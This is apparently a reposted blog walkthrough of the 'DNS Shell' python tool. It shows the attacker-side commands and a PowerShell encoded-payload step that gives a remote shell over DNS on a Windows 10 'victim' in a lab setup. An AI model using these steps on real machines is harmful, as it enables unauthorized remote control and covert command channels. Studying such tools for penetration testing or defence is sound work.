17.5 C
Jaipur
Sunday, January 24, 2021

DNS Shell – Tool to Compromise and Maintain control Over Victim Machine

Must read

DNS protocol runs on the application layer of the TCP/IP Model. When an attacker or pentester tries to exploit DNS with RCE vulnerability (Remote Command Execution) destination server acts as the backdoor.

DNS Shell Tool is a python based Exploitation tool to compromise and also maintaining the access via command and control to the server.

Here I have used Kali Linux(Attacker Machine) and Victim Machine (Windows 10)

ATTACKER MACHINE

  • Download the DNS SHELL tool HERE
  • Execute the command: python DNS-SHELL.py
  • It can be utilized with different modes, Recursive mode (It will run the DNS name) and Direct mode will run as Ip address provided (Kali Linux IP)

Generating Payload – DNS Shell

  • Above Figure is Recursive mode.
  • Recursive Command Executed: Python DNS-Shell.py -l -r <Domain Name>

NOTE: Command to be executed for direct mode: Python DNS-Shell.py -l -d

  • Above figure shows recursive mode has generated payload.

Victims Machine

  • Run & Execute the Command with CMD: Powershell.exe -e <Copy and paste the Generated Payload HERE>

BACK TO ATTACKERS MACHINE

  • Once the payload is executed in victims machine. Shell of Windows 10 machine is obtained.
  • Above Figure shows destination (windows 10) now acts as backdoor and command is entered and turns to Convert Channel to over port 53 of DNS.Happy Hacking !!!

Source link

- Advertisement -

More articles

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Latest article